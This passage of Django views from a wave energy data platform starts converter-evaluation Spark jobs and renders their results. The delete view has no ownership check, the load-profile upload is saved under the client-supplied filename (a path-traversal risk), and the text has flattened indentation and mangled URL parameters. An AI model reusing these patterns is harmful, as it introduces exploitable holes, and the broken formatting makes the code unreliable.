max_height=new_wec['max_height'],
min_energy_period=new_wec['min_energy_period'],
max_energy_period=new_wec['max_energy_period'],
sample_rows=new_wec['data'],
owner_id=request.user
)
converter.save()
return JsonResponse({'id': converter.id})
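# Hypothetical 'wec_data' payload assumed by wec_creation():
#   {"title": "Point absorber A", "min_height": 0.5, "max_height": 6.0,
#    "min_energy_period": 3.0, "max_energy_period": 12.0,
#    "data": [[...power matrix rows...]]}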
def wec_delete(request):
wec_id = int(request.GET['wec_id'])
wec = Wave_Energy_Converters.objects.get(pk=wec_id)
wec.delete()
return JsonResponse({})
@never_cache
def energy_conversion_init(request):
execution_steps = dict()
execution_steps['WEC_LOCATION_EVALUATION_SERVICE'] = ['starting service', 'Initializing Spark Session'] + \
[x['status'] for x in settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS] + \
['done']
execution_steps['WEC_GENERATION_FORECAST_SERVICE'] = ['starting service', 'Initializing Spark Session'] + \
[x['status'] for x in settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS] + \
['done']
execution_steps['WEC_AREA_EVALUATION_SERVICE'] = ['starting service', 'Initializing Spark Session'] +\
[x['status'] for x in settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS] + \
['done']
execution_steps['WEC_LOAD_MATCHING_SERVICE'] = ['starting service', 'Initializing Spark Session'] +\
[x['status'] for x in settings.WEC_LOAD_MATCHING_SERVICE_PARAGRAPHS] + \
['done']
energy_converters_user = Wave_Energy_Converters.objects.filter(owner_id=request.user)
energy_converters_public = Wave_Energy_Converters.objects.filter(owner_id=User.objects.get(username='BigDataOcean'))
energy_converters_all = energy_converters_user | energy_converters_public
for dataset in DATASETS:
try:
service_dataset = Dataset.objects.get(pk=dataset["id"])
print "----------------brhkame dataset"
try:
dataset["min_lat"] = float(service_dataset.spatialSouth)
except:
dataset["min_lat"] = -90
try:
dataset["max_lat"] = float(service_dataset.spatialNorth)
except:
dataset["max_lat"] = 90
try:
dataset["min_lng"] = float(service_dataset.spatialWest)
except:
dataset["min_lng"] = -180
try:
dataset["max_lng"] = float(service_dataset.spatialEast)
except:
dataset["max_lng"] = 180
dataset["min_date"] = service_dataset.temporalCoverageBegin
dataset["max_date"] = service_dataset.temporalCoverageEnd
if service_dataset.id == 111:
dataset["max_date"] = datetime.now() + timedelta(days=7)
dataset["min_lat"] = 35
dataset["max_lat"] = 45
dataset["min_lng"] = -14
dataset["max_lng"] = -7
except:
print "dataset not found"
return render(request, 'wave_energy_pilot/energy_conversion_service.html',
{'datasets_list': DATASETS,
'energy_converters_user': energy_converters_user,
'energy_converters_public': energy_converters_public,
'energy_converters_all': energy_converters_all,
'data_radius': DATA_RADIUS,
'execution_steps': execution_steps})
@never_cache
def wec_single_location_evaluation_execute(request):
service = Service.objects.get(pk=settings.WEC_LOCATION_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wec_single_location_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
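# All *_execute views follow the same pattern: persist a ServiceInstance in
# the "starting service" state, run the heavy work on a background Thread,
# and immediately return the instance id so the client can poll the matching
# status endpoint and finally fetch the results page.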
def wec_single_location_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
converters_selection = request.GET.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
dataset_id = str(request.GET["dataset_id"])
query_id = settings.WEC_LOCATION_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
power_cols_str = ''
cap_factors_cols_str = ''
unit_list_1 = ''
unit_list_2 = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
power_cols_str += '&y_var[]=power for ' + str(converter.title) + '&y_var_min[]=None&y_var_max[]=None'
unit_list_1 += 'kW,'
cap_factors_cols_str += '&y_var[]=capacity factor for ' + str(converter.title) + '&y_var_min[]=0&y_var_max[]=100'
unit_list_2 += '%,'
cap_factors_cols_str += '&y_var[]=avg(capacity factor for ' + str(converter.title) + ')&y_var_min[]=0&y_var_max[]=100'
unit_list_2 += '%,'
unit_list_1 = unit_list_1[:-1]
power_cols_str += '&y_var_unit=' + unit_list_1
unit_list_2 = unit_list_2[:-1]
cap_factors_cols_str += '&y_var_unit=' + unit_list_2
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Generated Power",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_df&same_axis=1¬ebook_id=" + str(
new_notebook_id) + power_cols_str,
'done': False})
visualisations['v2'] = ({'notebook_id': new_notebook_id,
'df': 'wec_cap_factors_df',
'query': '',
'title': "Capacity Factor",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=wec_cap_factors_df¬ebook_id=" + str(new_notebook_id) + cap_factors_cols_str,
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_single_location_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converters = [str(name) for name in result['name']]
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_location_assessment result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Assessment of Wave Energy Converters in a Single Location',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technologies:', 'value': str(converters)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_area_evaluation_execute(request):
service = Service.objects.get(pk=settings.WEC_AREA_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wec_area_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_area_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["latitude_from", "latitude_to", "longitude_from", "longitude_to", "start_date", "end_date"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
converters_selection = request.GET.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
args_to_note['dataset_id'] = request.GET['dataset_id']
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.GET['dataset_id']
query_id = settings.WEC_AREA_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
power_cols_str = ''
cap_factors_cols_str = ''
shut_down_cols_str = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
power_cols_str += '&contour_var0=power for ' + str(converter.title) + '&contour_var_unit0=kW/m'
cap_factors_cols_str += '&contour_var0=capacity factor for ' + str(converter.title) + '&contour_var_unit0=%'
shut_down_cols_str += '&contour_var0=danger times for ' + str(converter.title) + '&contour_var_unit0=hours'
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "WEC Average Power Output",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=power_df¬ebook_id0=" + str(new_notebook_id) + power_cols_str,
'done': False})
visualisations['v2'] = ({'notebook_id': new_notebook_id,
'df': 'wec_cap_factors_df',
'query': '',
'title': "WEC Capacity Factor",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=wec_cap_factors_df¬ebook_id0=" + str(new_notebook_id) + cap_factors_cols_str,
'done': False})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'danger_times_df',
'query': '',
'title': "Number of Shut Down Hours",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=danger_times_df¬ebook_id0=" + str(new_notebook_id) + shut_down_cols_str,
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_AREA_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 360))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
# clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_area_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
latitude_from = str(result['latitude_from'])
latitude_to = str(result['latitude_to'])
longitude_from = str(result['longitude_from'])
longitude_to = str(result['longitude_to'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converters = [str(name) for name in result['name']]
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_area_assessment result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Performance of Wave Energy Converter in a Wide Area',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': 'from (' + latitude_from + ', ' + longitude_from + ') to (' + latitude_to + ', ' + longitude_to + ')'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technologies:', 'value': str(converters)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_generation_forecast_execute(request):
service = Service.objects.get(pk=settings.WEC_GENERATION_FORECAST_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wec_generation_forecast_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_generation_forecast_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET['dataset_id'])).table_name
converters_selection = request.GET.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
args_to_note['dataset_id'] = request.GET['dataset_id']
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.GET['dataset_id']
query_id = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
power_cols_str = ''
unit_list_1 = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
power_cols_str += '&y_var[]=power for ' + str(converter.title)
unit_list_1 += 'kW,'
unit_list_1 = unit_list_1[:-1]
power_cols_str += '&y_var_unit=' + unit_list_1
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Generated Power",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_df¬ebook_id=" + str(
new_notebook_id) + power_cols_str,
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_LOCATION_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_generation_forecast_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converter = str(result['name'][0])
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_generation_forecast result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Wave Power Generation Forecast',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technology used:', 'value': str(converter)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_load_matching_execute(request):
service = Service.objects.get(pk=settings.WEC_LOAD_MATCHING_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
load_profile_csv = request.FILES['load_profile_csv']
if not load_profile_csv.name.endswith('.csv'):
return HttpResponse(status=500)
    # Write the uploaded load profile to disk (note: the client-supplied
    # filename is used as-is)
    with open('wave_energy_pilot/static/wave_energy_pilot/files/load_matching/' + load_profile_csv.name, 'wb') as fout:
        for chunk in load_profile_csv.chunks():
            fout.write(chunk)
# Spawn thread to process the data
t = Thread(target=wec_load_matching_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_load_matching_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
try:
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to", "dataset_id"]
args_to_note = gather_service_args(service_args, request, service_exec, 'post')
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.POST['dataset_id'])).table_name
load_profile_csv = request.FILES['load_profile_csv'].name
args_to_note['load_profile_csv'] = load_profile_csv
converters_selection = request.POST.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
dataset_id = request.POST['dataset_id']
query_id = settings.WEC_LOAD_MATCHING_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id, 'post')
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
cols_str = ''
cols_str_norm = ''
unit_list_1 = ''
unit_list_2 = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
cols_str += '&y_var[]=power for ' + str(converter.title)
cols_str_norm += '&y_var[]=power for ' + str(converter.title) + '_normalized'
unit_list_1 += 'kW,'
unit_list_2 += 'kW,'
        # one extra 'kW' unit for the load_profile column appended below
        unit_list_1 = unit_list_1 + 'kW'
        cols_str += '&y_var_unit=' + unit_list_1
        unit_list_2 = unit_list_2 + 'kW'
        cols_str_norm += '&y_var_unit=' + unit_list_2
        cols_str += '&y_var[]=load_profile'
        cols_str_norm += '&y_var[]=load_profile_normalized'
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "Physical units comparison",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_df¬ebook_id=" + str(new_notebook_id) + cols_str + "&same_axis=1",
'done': False})
visualisations['v2'] = ({'notebook_id': new_notebook_id,
'df': 'power_norm_df',
'query': '',
'title': "Normalized values comparison",
'url': "/visualizations/get_line_chart_am/?x_var=time&df=power_norm_df¬ebook_id=" + str(new_notebook_id) + cols_str_norm + "&same_axis=1",
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
except Exception as e:
print 'exception in preparing execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
            if 'livy_session' in request.GET.keys():
                pass
            else:
                if service_exec.service.through_livy:
                    close_livy_session(service_exec.livy_session)
            # setup failed: bail out so the execution block below does not run
            # with an incomplete state (e.g. an undefined arguments paragraph)
            return
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_LOAD_MATCHING_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_load_matching_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converter = str(result['name'][0])
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_load_matching result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Assessment of Wave Energy Generation and Load Matching',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technology used:', 'value': str(converter)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def energy_conversion_status(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
return JsonResponse({'status': service_exec.status})
@never_cache
def init(request):
execution_steps = dict()
execution_steps['LOCATION_EVALUATION_SERVICE'] = ['starting service', 'Initializing Spark Session'] + [x['status'] for x in settings.LOCATION_EVALUATION_SERVICE_PARAGRAPHS] + ['done']
execution_steps['WAVE_FORECAST_SERVICE'] = ['starting service', 'Initializing Spark Session'] + [x['status'] for x in settings.WAVE_FORECAST_SERVICE_PARAGRAPHS] + ['done']
execution_steps['AREA_EVALUATION_SERVICE'] = ['starting service', 'Initializing Spark Session'] + [x['status'] for x in settings.AREA_EVALUATION_SERVICE_PARAGRAPHS] + ['done']
execution_steps['DATA_VISUALISATION_SERVICE'] = ['starting service']
for dataset in DATASETS:
try:
service_dataset = Dataset.objects.get(pk=dataset["id"])
print "----------------brhkame dataset"
try:
dataset["min_lat"] = float(service_dataset.spatialSouth)
except:
dataset["min_lat"] = -90
try:
dataset["max_lat"] = float(service_dataset.spatialNorth)
except:
dataset["max_lat"] = 90
try:
dataset["min_lng"] = float(service_dataset.spatialWest)
except:
dataset["min_lng"] = -180
try:
dataset["max_lng"] = float(service_dataset.spatialEast)
except:
dataset["max_lng"] = 180
dataset["min_date"] = service_dataset.temporalCoverageBegin
dataset["max_date"] = service_dataset.temporalCoverageEnd
if service_dataset.id == 111:
dataset["max_date"] = datetime.now() + timedelta(days=7)
dataset["min_lat"] = 35
dataset["max_lat"] = 45
dataset["min_lng"] = -14
dataset["max_lng"] = -7
except:
print "dataset not found"
print 'pre creating livy session'
host = settings.LIVY_URL
headers = {'Content-Type': 'application/json', 'X-Requested-By': 'Admin'}
data = { 'kind': 'pyspark',
'jars': ['/user/livy/jars/postgresql-42.2.2.jar', '/user/livy/jars/presto-jdbc-0.213.jar'],
'driverMemory': '512m',
'driverCores': 1,
'numExecutors': 1,
'executorMemory': '3g',
'executorCores': 2,
'heartbeatTimeoutInSecond': 120,
'conf': {'spark.driver.maxResultSize': '2g'}}
response = requests.post(host + '/sessions', data=json.dumps(data), headers=headers).json()
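    # The response of the POST above is intentionally unused: the call only
    # pre-warms a Livy session (assumed intent) so the first service execution
    # does not pay the full Spark start-up cost.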
return render(request, 'wave_energy_pilot/load_service.html',
{'buoys_list': BUOYS,
'datasets_list': DATASETS,
'data_radius': DATA_RADIUS,
'execution_steps': execution_steps})
@never_cache
def data_visualization_results(request):
service = Service.objects.get(pk=settings.DATA_VISUALISATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
start_date = request.GET["start_date"]
end_date = request.GET["end_date"]
latitude_from = float(request.GET["latitude_from"])
latitude_to = float(request.GET["latitude_to"])
longitude_from = float(request.GET["longitude_from"])
longitude_to = float(request.GET["longitude_to"])
dataset_id = request.GET["dataset_id"]
query_id = settings.DATA_VISUALISATION_SERVICE_DATASET_QUERY[dataset_id]
visualization_query_id = get_query_with_updated_filters(request, query_id)
variables_selection = request.GET.getlist("variables[]")
variable_list = find_visualization_variables(variables_selection, visualization_query_id)
y_var = ""
base_string = "y_var[]="
for variable in variable_list:
y_var += base_string + str(variable['query_variable']) + "&"
visualizations = dict()
visualizations['v1'] = ({'notebook_id': '',
'df': '',
'query': visualization_query_id,
'title': "Time Series Graph",
